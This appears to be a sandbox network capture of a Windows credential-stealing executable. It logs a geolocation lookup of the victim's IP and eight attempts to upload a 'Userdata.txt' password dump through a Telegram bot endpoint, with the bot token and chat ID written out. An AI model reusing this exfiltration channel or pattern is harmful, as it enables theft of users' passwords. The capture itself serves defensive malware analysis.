                                                                                                          2025-01-11 02:05:26 UTC1390INData Raw: ff cd bd bd 0b f7 d4 70 77 7b 21 d5 f7 71 1d 64 fd 9d 48 35 e0 f9 b3 5f e1 17 ee 0e fe 25 ea f2 7e 48 83 26 68 33 79 a7 4d 15 22 36 6a 35 ba fa ad 61 05 29 41 8b 98 7a da 1c d4 4f f6 18 4c f1 ad 11 71 0f 10 b8 51 82 2b 3f 77 13 27 19 91 f9 8e 54 97 62 40 6c 07 9b 0d 56 09 96 a4 12 61 cf 69 52 6c 63 df 37 8c 55 2e 53 c5 a0 d0 e4 cc a5 ef 7c dd 19 76 8f 79 29 77 65 3d 99 00 85 a7 69 03 68 ce e5 8b 0e 47 7d 27 0d 13 df ee c6 48 23 ef 7e f3 58 e5 b3 6b 5b 8b bb 55 45 95 97 f7 69 00 16 7c 87 d7 66 de 06 83 04 6e 47 7f 6f 78 80 a8 94 0f f7 2b a3 cd d7 2a 2b 61 a3 37 0a d8 e7 82 25 cf 6b 85 ae b2 9c 1f 6b 24 5c b1 14 71 21 2c 0d 88 ca c4 8e 6e ad ac 44 48 c7 ff 4a 27 bb 6b 62 74 f1 b8 5b 83 e3 30 12 95 c8 3d 1e 0f 6c 42 b9 60 6d 51 fc 97 1c 6a d8 a4 46 6d 6f b5
                                                                                                          Data Ascii: pw{!qdH5_%~H&h3yM"6j5a)AzOLqQ+?w'Tb@lVaiRlc7U.S|vy)we=ihG}'H#~Xk[UEi|fnGox+*+a7%kk$\q!,nDHJ'kbt[0=lB`mQjFmo
                                                                                                          2025-01-11 02:05:26 UTC1390INData Raw: f5 72 62 62 21 e2 5d 8a 98 6f b6 78 9a 1b 98 51 35 78 ed c1 51 e3 30 ba c7 ec cb c3 95 ee 04 7b 64 9c 0b 61 ab 91 ba 13 84 f8 72 b9 92 5a 44 72 03 67 19 56 cc 89 e9 4a 47 14 02 c7 2f 03 40 b0 da 34 df 52 d5 db 6b 10 c0 d8 0a 15 3a 5c 95 48 13 5e 70 85 c4 11 a2 27 e7 cf c7 50 33 95 11 a8 10 29 94 85 d7 4d e1 65 0a ed bf 0b a3 80 e3 21 f1 c6 7f d3 56 5b aa 8c 87 62 19 2b 41 a1 ff 09 69 5f 7b d7 ac 72 c4 88 b5 89 de 02 ab 9f 9f 55 b3 c2 79 1a ba e5 7e cb c8 00 58 69 6f de 57 84 00 b0 90 8d c3 0d d5 05 70 1f 27 3c 32 32 c3 a4 ce 50 03 66 9a 6d 2b 08 f4 46 98 c2 5b ad c2 f8 36 17 dd cb 2f 88 4c 05 43 e2 aa 5f 47 2e 66 b2 a2 30 59 84 b3 4b 93 cd bd 72 b9 b9 70 74 11 69 15 15 d6 dd a8 c7 f3 f2 d6 f9 ba 34 2d d9 58 1a 87 fa 04 c4 26 b9 ce 2e 0f 84 3e 34 88 31 ee
                                                                                                          Data Ascii: rbb!]oxQ5xQ0{darZDrgVJG/@4Rk:\H^p'P3)Me!V[b+Ai_{rUy~XioWp'<22Pfm+F[6/LC_G.f0YKrpti4-X&.>41
                                                                                                          2025-01-11 02:05:26 UTC1390INData Raw: a6 fd 66 bf 1c fd 9a 47 e0 b8 3b d1 b5 9f 4b 19 b3 18 cd bb b3 2b 28 74 12 ae 8e cd dc 22 47 a3 94 6c 02 fa c1 e7 65 53 89 14 3a f5 e4 80 21 fb 2c c4 a5 4f a4 7c 9c 83 90 bc 3e eb 8e 18 21 61 33 9c 94 6b fe ee a4 44 6d a4 ea 77 39 69 b7 9c a6 8f 3b f7 f9 3b 37 49 41 b2 12 2b 73 00 4b b1 8b 5f bd d4 66 0d e4 94 b8 e9 13 e1 d8 a9 e8 4b d2 08 90 b3 c8 1e 20 6d 35 13 af e7 c7 2e 93 59 c7 72 62 d5 88 55 7e 5b 7c 17 af b0 a5 13 2e fe 40 c9 09 7e 3a e0 3d d8 ee df 66 5c 24 c7 5b f1 61 c7 15 65 ac 2e 73 c5 d2 0b 71 94 26 4f 28 44 c4 ea 7d 45 c1 f4 95 de b3 c7 e2 31 5c b1 d5 05 84 c1 0e 58 8b 34 d7 68 ce 06 33 29 57 1b 45 1d 84 96 a6 bd 29 e7 92 37 11 c3 93 55 14 0f d6 e0 7d 06 1d c2 b0 d7 61 95 40 52 b6 26 cc 95 d7 ae 63 93 46 40 4b cb 21 c1 de 21 f3 84 6b d4 1c
                                                                                                          Data Ascii: fG;K+(t"GleS:!,O|>!a3kDmw9i;;7IA+sK_fK m5.YrbU~[|.@~:=f\$[ae.sq&O(D}E1\X4h3)WE)7U}a@R&cF@K!!k
                                                                                                          2025-01-11 02:05:26 UTC1390INData Raw: 89 d2 76 f5 a3 1c b1 f2 72 5a c8 2a 29 96 68 66 6e 40 0a 64 8c 58 cf 54 6e e4 95 f0 ab c8 93 1d 82 00 9a 92 6c 05 9a 58 dd 6e ec 54 e4 17 24 b4 ca b7 1e 08 bd 86 44 a5 1b 5d 0c cb f3 05 06 83 5f 90 4b 0f 9a 97 52 64 36 0d 52 d1 c5 46 db 10 ae 2b ec 57 a5 60 1a 49 f9 25 94 e1 ed c0 e8 9f f5 ce 77 02 b3 0d 1d 2e 2c 4d 3e 2b 6b 76 0c 3c f7 ba d3 dd 61 c9 f3 9d 01 ad 39 a6 cd 79 0d ff d6 0d de 8b b3 47 e7 75 87 4d f7 36 b9 50 e5 3b 78 56 21 c2 12 78 e7 e7 d5 93 b6 73 5b 60 27 b6 9d 95 fa 2a 4e 2e 20 4d 89 49 72 2c 27 02 0b cf a3 37 54 a5 51 76 92 50 df ce b5 42 42 5e 8d 4e 61 4f 15 c2 bf a5 92 af 5f 1e 9a 4e 7b a5 71 a3 fa 0e 1f 28 83 19 ef 97 d8 1a 41 5c c1 b6 b0 aa c6 c2 ac 08 89 7a a6 fa 57 ef 4c 04 cb f5 61 89 b2 9b ac a8 f5 f3 4e 5d 9d 63 f9 fc 47 a2 45
                                                                                                          Data Ascii: vrZ*)hfn@dXTnlXnT$D]_KRd6RF+W`I%w.,M>+kv<a9yGuM6P;xV!xs[`'*N. MIr,'7TQvPBB^NaO_N{q(A\zWLaN]cGE


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          2192.168.2.1049711104.21.80.14438156C:\Users\user\Desktop\4NG0guPiKA.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-11 02:05:29 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                          Host: reallyfreegeoip.org
                                                                                                          Connection: Keep-Alive
                                                                                                          2025-01-11 02:05:29 UTC853INHTTP/1.1 200 OK
                                                                                                          Date: Sat, 11 Jan 2025 02:05:29 GMT
                                                                                                          Content-Type: text/xml
                                                                                                          Content-Length: 362
                                                                                                          Connection: close
                                                                                                          Age: 1875918
                                                                                                          Cache-Control: max-age=31536000
                                                                                                          cf-cache-status: HIT
                                                                                                          last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QoFHZwgFB%2FU9QcPXyGEs%2FevgDALndS9LB84FWJSXX0WzJkGiZILLBLesj6wF9hr7Ls058yr8bK2nWUaly1iktvy32kD55Z2nBmNBNYNAsJAqGHLbtLzLRjpnoHs1KwefNRdrA4g2"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 9001579359387d0e-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1988&min_rtt=1898&rtt_var=892&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1114503&cwnd=244&unsent_bytes=0&cid=06d0327c87b961ab&ts=160&x=0"
                                                                                                          2025-01-11 02:05:29 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                          Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          3192.168.2.1049712149.154.167.2204438156C:\Users\user\Desktop\4NG0guPiKA.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-11 02:05:35 UTC294OUTPOST /bot7766574905:AAHqEKY-434lRHaHTq5dzX-5SzIzpyCwC4s/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                          Content-Type: multipart/form-data; boundary================8dd31ba864dec1b
                                                                                                          Host: api.telegram.org
                                                                                                          Content-Length: 1090
                                                                                                          Connection: Keep-Alive
                                                                                                          2025-01-11 02:05:35 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 31 62 61 38 36 34 64 65 63 31 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                          Data Ascii: --===============8dd31ba864dec1bContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                          2025-01-11 02:05:37 UTC347INHTTP/1.1 401 Unauthorized
                                                                                                          Server: nginx/1.18.0
                                                                                                          Date: Sat, 11 Jan 2025 02:05:37 GMT
                                                                                                          Content-Type: application/json
                                                                                                          Content-Length: 58
                                                                                                          Connection: close
                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                          2025-01-11 02:05:37 UTC58INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 31 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 55 6e 61 75 74 68 6f 72 69 7a 65 64 22 7d
                                                                                                          Data Ascii: {"ok":false,"error_code":401,"description":"Unauthorized"}


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          4192.168.2.1049714149.154.167.2204438156C:\Users\user\Desktop\4NG0guPiKA.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-11 02:05:41 UTC294OUTPOST /bot7766574905:AAHqEKY-434lRHaHTq5dzX-5SzIzpyCwC4s/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                          Content-Type: multipart/form-data; boundary================8dd31feab93e593
                                                                                                          Host: api.telegram.org
                                                                                                          Content-Length: 1090
                                                                                                          Connection: Keep-Alive
                                                                                                          2025-01-11 02:05:41 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 31 66 65 61 62 39 33 65 35 39 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                          Data Ascii: --===============8dd31feab93e593Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                          2025-01-11 02:05:41 UTC347INHTTP/1.1 401 Unauthorized
                                                                                                          Server: nginx/1.18.0
                                                                                                          Date: Sat, 11 Jan 2025 02:05:41 GMT
                                                                                                          Content-Type: application/json
                                                                                                          Content-Length: 58
                                                                                                          Connection: close
                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                          2025-01-11 02:05:41 UTC58INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 31 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 55 6e 61 75 74 68 6f 72 69 7a 65 64 22 7d
                                                                                                          Data Ascii: {"ok":false,"error_code":401,"description":"Unauthorized"}


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          5192.168.2.1049716149.154.167.2204438156C:\Users\user\Desktop\4NG0guPiKA.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-11 02:05:45 UTC270OUTPOST /bot7766574905:AAHqEKY-434lRHaHTq5dzX-5SzIzpyCwC4s/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                          Content-Type: multipart/form-data; boundary================8dd322ad5683121
                                                                                                          Host: api.telegram.org
                                                                                                          Content-Length: 1090
                                                                                                          2025-01-11 02:05:45 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 32 61 64 35 36 38 33 31 32 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                          Data Ascii: --===============8dd322ad5683121Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                          2025-01-11 02:05:45 UTC347INHTTP/1.1 401 Unauthorized
                                                                                                          Server: nginx/1.18.0
                                                                                                          Date: Sat, 11 Jan 2025 02:05:45 GMT
                                                                                                          Content-Type: application/json
                                                                                                          Content-Length: 58
                                                                                                          Connection: close
                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                          2025-01-11 02:05:45 UTC58INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 31 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 55 6e 61 75 74 68 6f 72 69 7a 65 64 22 7d
                                                                                                          Data Ascii: {"ok":false,"error_code":401,"description":"Unauthorized"}


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          6192.168.2.1049720149.154.167.2204438156C:\Users\user\Desktop\4NG0guPiKA.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-11 02:05:51 UTC294OUTPOST /bot7766574905:AAHqEKY-434lRHaHTq5dzX-5SzIzpyCwC4s/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                          Content-Type: multipart/form-data; boundary================8dd327b8ca4e039
                                                                                                          Host: api.telegram.org
                                                                                                          Content-Length: 1090
                                                                                                          Connection: Keep-Alive
                                                                                                          2025-01-11 02:05:51 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 37 62 38 63 61 34 65 30 33 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                          Data Ascii: --===============8dd327b8ca4e039Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                          2025-01-11 02:05:52 UTC347INHTTP/1.1 401 Unauthorized
                                                                                                          Server: nginx/1.18.0
                                                                                                          Date: Sat, 11 Jan 2025 02:05:51 GMT
                                                                                                          Content-Type: application/json
                                                                                                          Content-Length: 58
                                                                                                          Connection: close
                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                          2025-01-11 02:05:52 UTC58INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 31 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 55 6e 61 75 74 68 6f 72 69 7a 65 64 22 7d
                                                                                                          Data Ascii: {"ok":false,"error_code":401,"description":"Unauthorized"}


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          7192.168.2.1049722149.154.167.2204438156C:\Users\user\Desktop\4NG0guPiKA.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-11 02:05:54 UTC270OUTPOST /bot7766574905:AAHqEKY-434lRHaHTq5dzX-5SzIzpyCwC4s/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                          Content-Type: multipart/form-data; boundary================8dd329c1e4798fc
                                                                                                          Host: api.telegram.org
                                                                                                          Content-Length: 1090
                                                                                                          2025-01-11 02:05:54 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 39 63 31 65 34 37 39 38 66 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                          Data Ascii: --===============8dd329c1e4798fcContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                          2025-01-11 02:05:54 UTC347INHTTP/1.1 401 Unauthorized
                                                                                                          Server: nginx/1.18.0
                                                                                                          Date: Sat, 11 Jan 2025 02:05:54 GMT
                                                                                                          Content-Type: application/json
                                                                                                          Content-Length: 58
                                                                                                          Connection: close
                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                          2025-01-11 02:05:54 UTC58INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 31 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 55 6e 61 75 74 68 6f 72 69 7a 65 64 22 7d
                                                                                                          Data Ascii: {"ok":false,"error_code":401,"description":"Unauthorized"}


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          8192.168.2.1049725149.154.167.2204438156C:\Users\user\Desktop\4NG0guPiKA.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-11 02:06:02 UTC294OUTPOST /bot7766574905:AAHqEKY-434lRHaHTq5dzX-5SzIzpyCwC4s/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                          Content-Type: multipart/form-data; boundary================8dd32f4decf3f7a
                                                                                                          Host: api.telegram.org
                                                                                                          Content-Length: 1090
                                                                                                          Connection: Keep-Alive
                                                                                                          2025-01-11 02:06:02 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 66 34 64 65 63 66 33 66 37 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                          Data Ascii: --===============8dd32f4decf3f7aContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                          2025-01-11 02:06:02 UTC347INHTTP/1.1 401 Unauthorized
                                                                                                          Server: nginx/1.18.0
                                                                                                          Date: Sat, 11 Jan 2025 02:06:02 GMT
                                                                                                          Content-Type: application/json
                                                                                                          Content-Length: 58
                                                                                                          Connection: close
                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                          2025-01-11 02:06:02 UTC58INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 31 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 55 6e 61 75 74 68 6f 72 69 7a 65 64 22 7d
                                                                                                          Data Ascii: {"ok":false,"error_code":401,"description":"Unauthorized"}


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          9192.168.2.1049728149.154.167.2204438156C:\Users\user\Desktop\4NG0guPiKA.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-11 02:06:12 UTC294OUTPOST /bot7766574905:AAHqEKY-434lRHaHTq5dzX-5SzIzpyCwC4s/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                          Content-Type: multipart/form-data; boundary================8dd336aba261beb
                                                                                                          Host: api.telegram.org
                                                                                                          Content-Length: 1090
                                                                                                          Connection: Keep-Alive
                                                                                                          2025-01-11 02:06:12 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 33 36 61 62 61 32 36 31 62 65 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                          Data Ascii: --===============8dd336aba261bebContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                          2025-01-11 02:06:12 UTC347INHTTP/1.1 401 Unauthorized
                                                                                                          Server: nginx/1.18.0
